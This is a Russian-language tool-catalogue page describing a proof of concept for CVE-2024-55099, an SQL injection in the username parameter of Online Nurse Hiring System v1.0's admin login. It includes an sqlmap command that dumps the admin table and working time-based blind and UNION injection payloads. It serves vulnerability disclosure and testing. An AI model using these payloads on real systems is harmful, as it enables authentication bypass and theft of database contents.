Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — Доказательство концепции эксплуатации уязвимости CVE-2024-55099, демонстрирующее SQL-инъекцию в Online Nurse Hiring System v1.0 через несанитизированный параметр username, позволяющую перебор базы данных и обход аутентификации. | Kitploit
Инструменты/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

Доказательство концепции эксплуатации уязвимости CVE-2024-55099, демонстрирующее SQL-инъекцию в Online Nurse Hiring System v1.0 через несанитизированный параметр username, позволяющую перебор базы данных и обход аутентификации.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-Уязвимость-SQL-инъекции

  • Автор эксплойта: ugurkarakoc

Домашняя страница вендора

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

Ссылка на программное обеспечение

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

Обзор

  • Online-Nurse-Hiring-System-v1.0 Недостаточная проверка и очистка входных данных параметра 'username' может создать уязвимость к SQL-инъекциям, позволяя несанкционированный доступ к базе данных и ставя под угрозу безопасность системы.

Детали уязвимости

  • Идентификатор CVE: CVE-2024-55099
  • Затронутая версия: Online-Nurse-Hiring-System-v1.0
  • Уязвимый файл: /admin/index.php.
  • Имена параметров: username
  • Тип атаки: Local

Ссылки:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

Описание

  • Отсутствие надлежащей проверки и очистки входных данных параметра 'username' позволяет злоумышленнику создавать запросы SQL-инъекции, обходить механизмы аутентификации и получать несанкционированный доступ к базе данных.

Подтверждение концепции (PoC) :

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
root@kitploit:~
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

Скачать инструмент